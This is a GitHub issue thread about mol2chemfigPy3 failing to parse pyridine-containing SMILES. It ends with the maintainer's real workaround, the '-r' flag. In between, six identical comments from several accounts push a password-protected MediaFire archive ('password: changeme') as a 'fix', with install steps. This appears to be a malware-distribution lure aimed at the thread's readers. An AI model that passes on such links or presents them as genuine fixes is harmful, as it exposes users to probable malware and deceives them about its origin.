### ISSUE TITLE
Issue with Parsing Pyridine-containing Structures Resulting in "Failed..."

### ISSUE THREAD

**Issue by W-Geong** [Augus1999/mol2chemfigPy3#4]
Hi there,

This repo has been a great help to me. Thank you very much for your contributions. While using it, I've found that for some specific structures, the parsing result outputs Failed.... Based on my observation, this seems to be caused by cases where a carbon atom in the benzene ring is replaced by a nitrogen atom (i.e., pyridine), such as in N#Cc1cnc(cn1)Oc1ccc(cc1Cl)F, ONC(=O)CCC(Cc1ccnc(c1)c1ccc(cc1)O)CCCNC(=O)c1ccccc1, and CCN(c1ccccc1C)C(=O)c1ccc(nn1)n1cncn1, among others.

Is there a way to fix this issue? I would also appreciate any suggestions for possible modifications.

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Augus1999** [comment]
Sorry for the late response.

This issue occurs because `epam.indigo` package does not know how to deal with aromatic nitrogen in some cases. Using flag `-r` can bypass it. For example, in command line
```bash
$  mol2chemfig -zwo -r -i direct "N#Cc1cnc(cn1)Oc1ccc(cc1Cl)F"
```
or in a script
```python
from mol2chemfigPy3 import mol2chemfig

mol2chemfig("N#Cc1cnc(cn1)Oc1ccc(cc1Cl)F", "-r")
```
